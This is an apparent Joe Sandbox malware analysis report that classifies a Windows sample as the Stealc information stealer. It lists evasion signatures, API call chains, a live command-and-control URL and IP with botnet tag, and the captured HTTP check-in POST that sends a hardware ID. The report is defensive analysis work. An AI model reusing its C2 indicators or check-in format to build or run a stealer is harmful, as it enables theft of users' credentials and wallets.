Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561817
MD5:6ae8d6dbe0f7340866c08c3f7b65978a
SHA1:b1afeaa2019c2df5c0be69191ed9c91ba0af72cd
SHA256:425637dfc7232d7373898820b23226d268bf36496b766b5e367a06855864549f
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7476 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6AE8D6DBE0F7340866C08C3F7B65978A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1430969378.00000000052E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7476JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7476JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T11:33:32.820692+010020442431Malware Command and Control Activity Detected192.168.2.749704185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.phpKZAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/ninet.dllAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.7476.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 39%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00904C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00904C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009240B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_009240B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_009060D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00916960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00916960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0090EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00909B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00909B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00909B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00909B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00916B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00916B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00907750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00907750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00913910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00913910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0091E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00911250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00911250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00911269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00911269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00912390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00912390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0090DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0090DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0091CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00914B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00914B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00914B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00914B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0091DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0091D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009016A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49704 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 46 39 41 46 42 33 31 30 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="hwid"2DF9AFB310603810289448------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="build"mars------CBKFIECBGDHJKECAKFBG--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00904C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00904C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 46 39 41 46 42 33 31 30 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="hwid"2DF9AFB310603810289448------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="build"mars------CBKFIECBGDHJKECAKFBG--
              Source: file.exe, 00000000.00000002.1518473176.00000000015CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1518473176.0000000001629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1518473176.0000000001629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/8
              Source: file.exe, 00000000.00000002.1518473176.0000000001629000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1518473176.0000000001646000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1518473176.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1518473176.00000000015CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpKZ
              Source: file.exe, 00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ninet.dll
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00909770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00909770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9C8A10_2_00B9C8A1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009248B00_2_009248B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB49BA0_2_00CB49BA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C389550_2_00C38955
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBD1640_2_00CBD164
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC3ACB0_2_00CC3ACB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB9AB10_2_00CB9AB1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBE3E80_2_00BBE3E8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C86CCF0_2_00C86CCF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC04D90_2_00CC04D9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBB4FE0_2_00CBB4FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B96C440_2_00B96C44
